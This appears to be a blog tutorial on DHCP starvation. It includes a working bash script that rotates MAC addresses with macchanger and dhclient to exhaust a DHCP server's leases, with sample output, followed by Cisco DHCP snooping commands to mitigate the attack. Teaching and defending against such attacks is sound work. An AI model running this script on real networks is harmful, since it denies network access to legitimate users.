DHCP starvation - quick and dirty

The DHCP starvation attack is quite simple to implement and therefore quite dangerous, especially if it grows to a DHCP spoofing attack. It can be used to implement a Denial of Service (DoS) attack against the DHCP server on the local network, thus preventing legitimate clients from accessing network resources. In this article we will demonstrate how this attack can be deployed and later we will go through the steps necessary to mitigate it on Cisco equipment with the help of DHCP snooping.

Scenario

The idea behind DHCP starvation is to make dummy leases for all IPs in the DHCP range. This will effectively cause a DoS, as all new network clients that request an IP address from the DHCP server, will not be served, as there will be no free IP addresses to lease. Depending on the lease time configured on the DHCP server, the effect of the attack will last as long as the time required for the leases to expire.

This attack can be automatically performed with yersinia, but for demonstration purposes we will use a quick and dirty script that only uses macchanger and dhclient.

macchanger is a great tool that just makes what it says in it’s name – it changes the MAC address of your network interface. dhclient on the other hand is the standard tool present in almost any Linux distribution, which is used for leasing an IP address from a DHCP server, and renewing the lease when necessary.

To the point – the following bash script demonstrates step by step the way that such attack works:

[email protected]:~# cat starve.sh
#!/bin/bash

while true; do
   # kill all running dhcp clients - just in case
   killall dhclient
   rm -f /var/run/dhclient.pid

   # bring down the interface
   ifconfig eth0 down

   # change the MAC address of the interface and print the new MAC address
   macchanger -a eth0 2>&1 | grep Faked

   # bring the interface up
   ifconfig eth0 up

   # make a new DHCP lease
   dhclient eth0 2>&1 | grep DHCPACK
done
[email protected]:~#

The results from running this script, besides causing a DoS attack (for which you will be personally responsible unless you are authorized to perform penetration testing of the network resources involved), will look much like this:

[email protected]:~# ./starve.sh
dhclient: no process killed
Faked MAC:   00:0e:7b:63:fc:18 (Toshiba)
DHCPACK of 192.168.123.207 from 192.168.123.1
Faked MAC:   00:30:63:ec:24:fb (Santera Systems, Inc.)
DHCPACK of 192.168.123.208 from 192.168.123.1
Faked MAC:   00:0b:30:df:69:28 (Beijing Gongye Science & Technology Co.,ltd)
Faked MAC:   00:0d:08:d3:d9:ad (Abovecable, Inc.)
Faked MAC:   00:05:20:49:1f:5a (Smartronix, Inc.)^C
[email protected]:~#

When you stop seeing DHCPACKs, this means that you have depleted the available leases of the DHCP server.

Mitigation

When IP allocation is done through DHCP servers, DHCP snooping can be configured on the switches to only allow clients with specific IP/MAC addresses to have access to the network.

Use the following commands to configure DHCP snooping:

To enable DHCP Snooping on a Cisco IOS switch, follow these steps:

! To enables DHCP Snooping globally enter:
switch(config)# ip dhcp snooping
! To enable DHCP Snooping for specific VLANs enter:
switch(config)# ip dhcp snooping vlan <vlan_id> {,<vlan_id>}
! To set the interface to trusted state, which will allow passing DHCP replies enter:
switch(config-if)# ip dhcp snooping trust
! To set a rate limit for DHCP Snooping enter:
switch(config-if)# ip dhcp snooping limit rate <rate>

Leave a Reply

 

 

 

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*